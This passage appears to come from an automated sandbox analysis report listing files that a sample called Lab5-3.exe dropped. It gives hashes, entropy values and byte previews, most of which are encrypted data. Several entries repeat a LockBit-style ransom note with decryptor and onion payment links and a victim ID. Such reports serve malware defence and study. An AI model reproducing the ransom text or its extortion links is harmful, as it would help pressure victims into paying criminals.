                                                                                                          Entropy (8bit):7.999027229156547
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:ShstbR8UD77yH8eBTEe7JO/YDNiLoRVVrEGGINQ09fT/6hpWGZ:YstbR8a7+HPBTCGiLg3cKRc3VZ
                                                                                                          MD5:46CF8F972A4118B2B279FA1C7D5876DF
                                                                                                          SHA1:63ADB8AFF5530692404345BF3E6688EA37E9786C
                                                                                                          SHA-256:3865113F8F45612D965E42C7D0316C380003761159C34B1E9ACD38C20A8FFD79
                                                                                                          SHA-512:7D16F8E40D84C5DBFEC7BA1D39E3FD4D282B4AE8AB6B5B5DA31F5CD0EBAF47E20398C04A277BCC6654916190858086125042B5D06C9A6DC41321B47FF30CF7BD
                                                                                                          Malicious:true
                                                                                                          Preview:....aO.Oo..I.&r."q@Xsz.....T......?........`8........q..V.3..*.Zn....Vn.fa...X.,..l..*S....&..'..e-..A..A.!H.m7vai7.z.G..|...........8Z....:^..?k;sX..Q.....W...\.|..on..aPHq.P.kv..Q8...S..8^f.L..<}..U....i ....O..~..U."...M..!..O....$......J..V.........Ho*.....9'p.8...*..$&.]..P.H5.p...Pf....5.9.W......5T...b?.ou.....3N....{..''6.wY.X......H4;.....z...."i.8.wI.\.X...t.<;.u2.Qqp ..b1.8.....XY...Z....pf]...?H^..I^_..!f.v.X3...9...$....`.t..:.k.^?C..7..(]...[.wH.L.....Xa..k....q...B....c....X..."'.5.p.B.{.~z...w.BA...`c.^!|...^.1Q.m'.e....g..s.>.XH..2.l..4~R/Uj..J.o.;..]v.....C..}E..7.G..]..73&.....|(.z)...o.U...].X...R. m.og.].-.h".y...K.{.Z.O...`C.,:....o....-../_.J.......S<...q..NWOvL...o. ...\..y.#.L/k.h[Z.}9..0..k.[........`....G......7!..._.......a..2.J:ab.(......#CE'..m.._..2x3C.~F...N.Q......N..;.....,..#...J.....%.zW7...x..E2.o.V...1.........!.......i.I...7......4k.e;..d.,..-n.g.H...``........(?1...z..."1*)T.3..0.}A>...Q..h...T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):187152
                                                                                                          Entropy (8bit):7.998996201714989
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:7LvH/t7fbfjXv+fCy7HDlZee0+yOXQs7rmzLJaQJF3xoesX9AwyJ+flOa4XZ:nXJfbjXYR940XQs4E2FWnKwL8aYZ
                                                                                                          MD5:E2ADCC012580BD03EE4ABAE10DF88AAE
                                                                                                          SHA1:FDF314CC3B0CF4CE592D5613D191385EB24F1586
                                                                                                          SHA-256:8F5E72463029C655F978DEE8B81BB6103983F7CA1F5AC49EA60AFFD0874772DB
                                                                                                          SHA-512:3DAE77A383D73ADF18A68E59A27E42C792FC6EC181E57550D9F20DFBB4A6CC79790F9533DD877E93B51B6C2521B55C3AF4AC1429818E6C28E553D574AA6C80EC
                                                                                                          Malicious:true
                                                                                                          Preview:".....H.T.v.N..>y...faG.Wt..5.3.Q.MI.{2D.Z~...V...5.Zs.H....j..wvN0..QF.{..w...v.p.&..a.....^{.P9..> ...+.....m...\v..$.W.j....*.b.[6.[..O.0.......N.e.|eY.L.D..a...l|]....>DU:...{'.A......o.P....... .....j..!.4.._.`J.4.....s.e.K#..\..rz$..w\..e....'..M..X.|w.....J:0..U.&..V...F7.d.,.8..../p...].DYh.q..)..Y....%3..j.......&.3{.Z..RN......|..&.~.u\....H....6..\.l...f1G....l.......".%...x....,.....;.x..w.....w.':.]*.@..V>.a.y...L.!..{L.....=.S...i....G.0.z.-....l_w.._..3....r#...#jR`#.d.....-.h.2..n.........."=..QCQ|O..T..G.-.X.|...a?..|l...C.Gy...:q;......\..]ZAc..6;..&x..-o.Do...;... .>..g.._.&..n...p.......Z..[...1.....SB......9.M..."....K4.D..OG...2h..hs..G.@..h...E,.M.. z.|..oV......c.N,...'.I.gb.}.U.RTi{....C...<..#...Z.>[A.UI.G...+....VtF.#KJ6.....I..L`..Y..."..r.....pv.......H....v..,..Q.i.>.EQ@....lN.....L.4.I...+.J ..gM.d...[N.....4.N.....Xy.F..+I..'u...h.6.v...>.r.N@..2..x...Z...d..UA..7.P... ..R8..K...f..0p..B....,C.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):427703
                                                                                                          Entropy (8bit):7.551514310040633
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:2KA38MvrojTbEpr274uFKsolH+TtPldBvaKXcmeucgL30wAykm2StFInPtOZ:2/qjTmrwpgsYeJNiKXZcgTg1m2NC
                                                                                                          MD5:CD4BB782C7029E66C040A507E8D25DF4
                                                                                                          SHA1:0A9364E69CDE15CE81143FB6342E6180F212CF10
                                                                                                          SHA-256:82F7545ADB619D53AEA35C16E818B9BA165818AC3DF38A8AB3902479171801A5
                                                                                                          SHA-512:3E8582E28C0E633BD94F778D9F9671427600B28E9E6FADCF4017F9E1CF2A63487A53D3BF50EFE002E5567D64C39BB87319BCE3C848F2C85E0CB38545ED483E4D
                                                                                                          Malicious:false
                                                                                                          Preview:.@1.ohb].6.d.]R,.a6.g......x"57HrI.ML..B...6N,>.W.....f..u...k.6......G....n....Q......6i.wd.)77/f..)ov{.a..>..h.vH:.@)H.hP.R........D+....N$.Q..AXU..P.Oe.....'..hu..5..|..K...d4..y*..(Q....4.....U.\.[..6}7..l..EO...{...... .....5h.{.....b..k.o..q;.q.{.^.Wu.s..5.H/....&^:(...y&..N.....i,-.2......G...A.g.,H..8w..U.z.t.V....C4.b.H..Q..oT<.B...r..R.v...K.\......o..`....F..%.,....{...?<y.uE..&L*..7x)C.Em...-....v.F....U.q$..ms$(...]...#..G9.....5l;1."p_....d.MT...Z! ..2.BwF.l<M.....*..[..x....KFy.y....{.V...G..,.MS.F...".|!..w.....).*.4.(.5<E.t..Ez:...z.....e...3.C...q......"..s.q..q.?0.0.0g](..O....m.s..,.xd....Cv..T@....T^I..]o.D..`....?m9Z..L.5.G......~.....7....[#.......;._.]&D".r?.#.s...."...oc ..g..|.%..._=xus\..sq'..%.*.>..*..r.....Qd..c..8.....y...U..P......#[..r<.!.'RKk...+....g.........A..G..och..OO{HA..~q.Y...3.:c a..,.y...\.k..aH.(.<DA_S..C.. L...../Q.I.....v..`..rwj:$........v=r.....n..Z..[.@............L.e..:.+Gb]...z.7.5x...a....P....w.1:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):187024
                                                                                                          Entropy (8bit):7.999052302703849
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:TaF8rC6N392SAJArI06MAd/jnZL4oln/YRygI9o3guOolcdvM/e0/vx2fo3k8zpn:+FiC6B92lJjnvZZL4mWEMguh/H0fohNX
                                                                                                          MD5:11CA4A821D7259F8658DFCEC7023A9A6
                                                                                                          SHA1:D6D4EC82B512A3EB3CFB702C4520F94EB8A6EBB8
                                                                                                          SHA-256:9DA5B1075FDE191E80230475BD6EFF91D1603C6C257A70CE3160FC3474D1DB2F
                                                                                                          SHA-512:C7FE85CFA9A3991571C334F8A2D43FB0A1B5397A6C9EA2C6D914D0095A87CF3BE6D0C345DD40DB54C2013213CF3022765BFFC888877C0275745B656ECB6F2F64
                                                                                                          Malicious:true
                                                                                                          Preview:..2j.....'...@.\q......(..6.7.G.b..%r...O.Pf_.|...y.L.Wrc...:.F.......>.@m.[...........L-.2.....U....bI4..E..g...~....j.Z%..2...n-.^[wt.:...pXY.....*.#..;I.un~.~c.[u.a......MP?=%{.{..R.0.rA.e.<p..z....?.|Y..A..g....q.#../5.l......C.......$..o..>~U.s.O..t..}...1..G...!..I~K...7.1.,.l.^... .d.5..p.~...f.[.....M..W......x...Y{.{tN...:....^o<G..k.n...z"....p..=x/....$f.=.E.!..|...9....m..V.|8T.W....'\O..)>i.../O..U......T9........b..OYnH....[..3.C.X..J7z.M....}'?h...22.tn........_.A.W..R..t....8....P&9.|m8.kj.T1d.>T.E.6.7%\j..=..-..j.a..TO.w+8m..m..:a....A<....6..!7..y...t)..$Y!.C.....l.Q.R...['...R.$(.....>W.z......ly$...a%s..x....P.K.'.!v..l.......N6.>.AVe~.$...Jh.e.a....|!H.`.*.|2V.(.$....T*$ 4.un.&......r.M..#..T.L.Q....o.<.d1.0..#a..Ebr.\d8...46..y.g?FF....r.....y...40g.L.F.......Q...u.U..f..c>...Y1..b..;S7.B.M.cr.3;..4...M.m..l.3.Y...2.....&....V....S...X8....GXY'}py.mQ../..:z...M.]..L.....8.hk)....^+#..GY.1..-.....S.o`.E...7Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):399302
                                                                                                          Entropy (8bit):7.633331925078989
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:KqMZPYL2H+VFe4gICXGInY+Lfv0fvy1Lf2Cipqx+dOR3RR2fPiIi3XaNZ:KLxHCgIJg8oz2bDd83RR2yXaH
                                                                                                          MD5:B1EF345FD3E68C0D91540FFE7195F5CF
                                                                                                          SHA1:9EC80FE6989CB462B9AF513EBC10E914EA6AB7FF
                                                                                                          SHA-256:D14A23DD1CF382692F26ED896E3FCBC9822F6613A32AC64F7B4A68253C50DAA4
                                                                                                          SHA-512:B58F8565DA4331E155C48532F0514CD8975675BEC0436E605B8BE3A81E9EBCAAA1E14750B4ABC011176B8EE3EAEB413E1596B7F1329D29ACCF67BBCCC049D1EE
                                                                                                          Malicious:false
                                                                                                          Preview:...jy.T.,.m..i.(....72l..2......M(4\.eAj.f.}F5"V*....."y^......bv.?O...2.lmuFo......4.b<.~...D.b........Q{)*.\.E%..)....r.X......S.. .X...v......X.j..B.s..Ys.4\....:.=.y/.1....lw...C9^._...a....xB.r...N*.......QI..Q....S..mi.....K5;+....k~.j.?...NH..vZ....b.25zx..{. i-I..aw|...0M.qPT....L.h\|....4.`t&..C.........).;}.a.+..%.L.F|.w.z....bpi........K..A.... ..K..;..:m.....<.'<.#J..@..]....A...!..z._.Th..9...y.6...pMS...'3]U.U.H.x...AP..y6.I.._.hQU_.....o....XR3E..@.&./Z.Aj...*R...'......=\.;<-...:...).fs......H..fI4....(`10U.........7Q.5G......k.e.wuT._.H%.6Q.......`a...)n.tD.............+nOGc.7{]..4..D..Z.|.KN.....9"....}..8.....MnH.f,.&.H.Z..ol.,F....&...^.R+N.^.{m1tBx..&.:e+....v..o..;N.xL..N@..].;5.H.~h.j..,]..U...'..J..GK|MwHA.....Xy......"....\cM.%....q......X.7....:.b.b.c.&.2....~..A..'.[.2..4; z.2...&..s$...y.g.].....Q.Ud7A.Cq&|}~............~.......5t.\..a...1......e....._......]...Y.X.y(..A.i.....}j)p......Q*!..491.x%2...._~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4944
                                                                                                          Entropy (8bit):7.962238543644213
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:JXvKEUANu+qaNRmGVJ6kRQRherIblViV88yCq9Gx0uKeY2ElUJ:lBnbqORuRhulVfylG0Cb
                                                                                                          MD5:CE0BB8740587D885E440D184F8C59BF2
                                                                                                          SHA1:8CCFAF6DF19CE15B2B5F0FDB3555A1CF1DF00058
                                                                                                          SHA-256:4EFBB0704AB7755AC6343410F1AC6264862300507A491E7418A73E274C93D3F2
                                                                                                          SHA-512:5E7492A9F978FA5207AC4BB8848B6E45990E64714C790655E1C9284AA3C9181C09F4F0DEA505D2D8B67B20BD75909669892E2888B40B9E63C0FA85AE6A362490
                                                                                                          Malicious:false
                                                                                                          Preview:.ZS..&.k.$......a.,..6.&.L@J..4(..q(-..Aa.84.MCF7.h.....t(..n..K..h...B..Y.....,.5...}%..w%..x.AiYw..S~.Q([....[..<i.t.M.~P.i;x5....]4W.x....h5j..N..2r.....)7..K........d.`}.iu..F....>(J&.5.."....Y.K:.^.c?.K.i... .>.K.Z.^..E<.9.r.!N....Xf......y......{8."....i.K.<t,....m8}!...2....E........5..E.'....7I.UP....o(g@....v.y(|.D&.D.A.T..Rs...^.../r..=.Vf...Vl...........2.S%.6...t.h..W.1#L...Tk.j...._..F..T./smp.&..r.fV....Z..Z.UkN.t...s..).h...o.N@.Q.....2DD.e.&l....*M."..i.... o..2..X.I......mT.~...."/....=Ye...l.~........c.U(.c..V`.t].:m...\V....7\...e...oK....03 .w~.....Kg...D..R^...K..4cv."T.aI....*.#4......R.D..x...u/G...9.8A..os...k.mWKik7{..-\..x.i....i..D.l.....zG?8{.k.#o..... .`h(...C.0;.\...w..[9........l..-U..(...m...g...O.7gY.n..q.WXuQP.~...w. .. ..&.........x!.o\.7.Z|.~..Z.C.M..m.Q..X.X2.......W.......|f....[[.......r.^9..A...=......B.JN..8.qN..%.....#HU.. .[)t=.l..z._..cw_...]q.Wm...7.<.6P:.g..el..-I.y.8...?)u....+\..'.V=..,`|8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.957418471764655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:436vwBjoWQa+5ZpPFxa3eXw0I2LJzOGx0uKeY2ElUJ:4KEI8ww0Hx0Cb
                                                                                                          MD5:78A20596F79C0B50904CC01332670212
                                                                                                          SHA1:17BB01DC371BFCA0DC331D93E7E0F1480EB8EE4A
                                                                                                          SHA-256:5C7F0E4F36EB9F21CE9EF536A294F27E1D337CD264CC118B2788D831B6DB55E4
                                                                                                          SHA-512:265EE434FEE039B6BD63CB807340E36CED5DC4E9F13AE524FED108FD3A82CE8869C9C016D30F5FE9E7FD30D8228A75452930E5CBF39A2466CC1F5A92D6E09A74
                                                                                                          Malicious:false
                                                                                                          Preview:aM...O$NZ.R.#..#.Q$..,.Yj.Xi*"..]..t....e%..5...-..S....^."...a.L.....O .g#(..8...d{.4.v>.r.....^pP....:.T...|.x.tN.w.-.]......%a.#I.s.[...p.%.;.g..0JA+..w..i..O0...a..Cx.....5!sl_./..YX!..X......d..8..P"7.v.PI..7...&...K.^.B..<`<>......"m...,...I.1~._.4.......V....96`.GJt..W.....db.....?z`q.T.....b..>..\E'$+.".dV.G.8.&K_...[...m....LS...1.8.t..g.{..7\{z..O..P.%Y...=.......Y.]..#]..)..W..52.cA..;.i}.?.xfH.(aC.n.`/w.!..]H...4.s..+.E.'...@drm5..{..-..H.:4P...`8..6...4'..U..z#.M..>.\..ZN....I...nAo.r.u...'....J..>z..........%..h.5.;'.......A..'....._.Q.. ..7..."..... ..........n.h..Q.c.U.1...d....../e.)s,m.uu....~x.["..t)z...G...<.Jk.L.]J....>....b.....W.N.S..b...M.e.7....@..=..B../f....a|.........."|1..q...4\:..._.0..x0H.....x.....{...l&......./=BMEZ0=..c.N.}%....cv..C..k....*..xDK..u_.J..<.;.....V{4.LGR......3..6..S.{{2...G.e..,.._..]f...)..o..*vA..E.....~.......'J.....3..+..N......}O....#C.o..'..._...D........G.i......n,.2Q...2......d....}
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4736
                                                                                                          Entropy (8bit):7.961737503691192
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Qil7rgGpDrVhUDwNLrxlu+9paxvOjmFNMXmGx0uKeY2ElUJ:Qs7hUDmX+IaJHo0Cb
                                                                                                          MD5:F757F378E74561F58AC7F6F56ADA7576
                                                                                                          SHA1:418F8A506E53CA5458B1FA13F20F0AC2CDFB3C6E
                                                                                                          SHA-256:637DD71FA2B3C57BF3DB5DC29CDF91BD549AC7AF8778F8A19B0D6317B6CC957F
                                                                                                          SHA-512:2AF155DF4919B7E92F2F14252462FB5B6F57096EFA6E3427B0A38FD2C1A0BB282E405753EAD18BC7516D802D096EE4206F23F1DF10D14E12A7BC4E5476FD0543
                                                                                                          Malicious:false
                                                                                                          Preview:.c$.]..B`.?.w.y.1.mQ,.wI...@..^Y..;..}.O..D...ME..5t.$<.......J). %...!}b.....D.....u....J.Y..5..4..Ko...|.59}7......Hw........~Zl.......lV.Bn.......0..w...0.Bi.......Yrj.^......F!..t..+..II..c...H..X...KCk M=.k....R....8...c....Pw.E...dL.$#..9..]...U..Ju*...&....:O....o.2..J..}>.....2.....c!&..Z..`_..j...o.+..g.".`.....Y..H.....H..LI..b=W..A.....;f.?..+..Q......,l.v..a_+.rs.....E?yj.Gk}G.1... +C1.V}.`(.F.[.E.A\......y5r_....T.n..Z.....T.cJyv"..W....m.l^)...L0.Oxv7...[2d..jz.%..`Z../....|..J;.2.C.1C.}.Q...f..c.K....0.3.%J....|..."..[.@...|.7..q.._..+.Ek.t..,.y...#......N.].>K....lo..H.~)I......r\.R..`.B....%&\.~.*n....i.2M.1.f8....@.R&8...Y.)0P.....>.....+..zI....3.0f.G(....v.u$...;.V......[i(F..........,.....4U..0.aq.+....]...A..w0).N....b:c..6!.....i.+.8......t"Z@=6....j.q.p.u.....6K.0...xk.OM.....f*..vB{...e.S&.Y4..Z..e.i./.y{U.v...O..K.!..^../..d...>..&L;....f..,(.......rD=...T.....!.Ez:..L9....R.!........&..I..J&p/NC...Yr..d.3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4128
                                                                                                          Entropy (8bit):7.9597992781677265
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hekAaNfRGbtbGhRNRQTthXeUDj5CxD7FEYZeFox/dGx0uKeY2ElUJ:sVaNY1Gh7RQTCUDVkD9Z4ox/m0Cb
                                                                                                          MD5:2ED32173306B2499DD6BF6C9C866385F
                                                                                                          SHA1:AC8B1F91AEF003437A6240DDD983C7EB9F3536FB
                                                                                                          SHA-256:A22DCD27CC4FAA302C7F227572F804EC9E6D08B547E9117578DA2A2BE87CA4CB
                                                                                                          SHA-512:7127AB12E92DF7769661FB5D1E844685CEC7932F6D4F2AE3754E7B28AAEFCA01B8300168A54F35E38074A0B0F4858EEE92FEE8565536975704FCA7A5E15C913E
                                                                                                          Malicious:false
                                                                                                          Preview:..h....I...`.\......H;h.g.z.g..i.L.!.Y.cy.U.H.YL|~}....g...'.A..s...+...fD+..Q..Bg...+..]..........jQU.;.N..;...RoP*\B...=....]..tl..9@.2."..K.iP1...X...oE.s.$q...$2.-.k..../......s`....D.p... .aLn...._....o........H....Y.....8U6..b..u"H....&.M.SN4!......f.X.....u...`.....q.-Lm\..RW....+..a....<A..h...7.+.V....a..tsPF(.`pWP.<c...h.1FPT..d5.Q6..;.(..g.h2@Fc<[.h.c...*i.....4.$k......V<.q...f....E.c#x..l.z.{p...[.32.Xs..poO$m......._.4S0.eT.....F.<;Y.q.=.|....S...u<.3...2.A.]z.J..n.u....I[.Oh.....,Z.kDJW.9.,....%3.w.Q.f1V"..W..0.@*.}*.^.H...v..........rq.;H%3...).y...sgR..q..1....Z.@Av7.Q.../..6.A$.../..C.....[F}D0...../W.!lLR=....d...i..,.5..+sZ7.0......l....].G....(....I4....;(w.FX.Uw.R....3.:..1]...{.<....o~.........F.QW.....z L9b8X9.J.j.SF...q...D.agvSw.let.....s.N.$|....|..&.....#^U..W.x^G.Z._.o....r.k. .. .%.*....9..c.7S.....9.?u....`..z...WFeP.......\....$....GSk5bP.]....b.......b.`F.x.cU..^jd.X.<v{...m.y.2H}..+.=K...jur....RK..._.?....S
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5072
                                                                                                          Entropy (8bit):7.965715594420499
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LOyvOfZjsfc5bJ1JzGZcF1JFBoyrxfM4YlVpZ+OjRX0Gx0uKeY2ElUJ:LOFfFsfcjzbF1jBv64HOjRX30Cb
                                                                                                          MD5:E39EC3DDC4A03CA7A170A4F58E9A7FE2
                                                                                                          SHA1:F005142667016F13348D5651254B81B3C49F5C26
                                                                                                          SHA-256:2B20E85E7F3CB59B5593500D7DB1864ED14A08FD046191FF0246D5AB580D9100
                                                                                                          SHA-512:E3C4249FDD8A7534DFCC2A91781F961493F3D92BB996831DE0686BD41602A6680F1A9E92CAF046145FC41E6378926F72191FC98B91678D91F5CA560D95E17774
                                                                                                          Malicious:false
                                                                                                          Preview:../.....Q<...|.x.....{...xV....O...7....t.q..F...U..,..WbP.+....6eB..r..X...X.l.....N...#.......R..........;..{} ...*..........'.$1'....X..........T....:........&..s...d.{w.-+)<....+...%9.w.0...w...kW..K}ytag@+.$6..].y3.....I.R.z.....j:+R?|.._..d.e....#.^..k.G..|....6K..%..R;.wU{.}haGl.l$.g!.....0i|....0.:...A}K..ct.>...!...G....T.V0.....vO....$.o. o..8F.=....Ay,..bnup.{.........=&['lI......P.O3..s.:...%e....u.<.I.?......j..Z(.w..c.e....p.a_...r1..s..#..h3.1....V;..a.^AF....Kq....M#.|o.g..j...w[..B..5....Z...u.....3 ....."...Q.A......!.a............+McP."&.1.e3...m....d..p...(;..I...R.F..).1j....KY.P.o......P.@....E. ?....\P .|..w.K.......\*2 .YI...c.....V....az....m...@X.Q.=...7..s...w1z..<...a<.rX.-P.uE...?.M...)..M).r.F,.l..;...9..?x.H.5..].'KI....E..Lz..PdS..3....2...op.......M>..mP*LW<....a.....:..... _A.....1...._...Y..t.&...$........F..Pj9.9.......0../B.jG.(.../....>dKaL../..^]5.}c.C....yY.g....t...c....t..}..{<..V.k..r.7...X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4256
                                                                                                          Entropy (8bit):7.95661828770915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8CoanuutTsnrT7VRKUGXZGx0uKeY2ElUJ:DHnuutTs/Vx0Cb
                                                                                                          MD5:75C3524AB72A8690AE1572376B3A7778
                                                                                                          SHA1:3F62643730CBD62EEF0A10164D7AD363E2B8514D
                                                                                                          SHA-256:C584E129A48B3AA941CF1E1DE37E85014F7BEDBFACE13F06B661B66AE13AF781
                                                                                                          SHA-512:9A1FEE7A58C0EE0D54DD0861BA72A535BAEBD206F452644D6DB093AFE9C72471628733064104F2928901EFA5FDD0FCF71A3E232D5B19F34FC5C7F5FA00163752
                                                                                                          Malicious:false
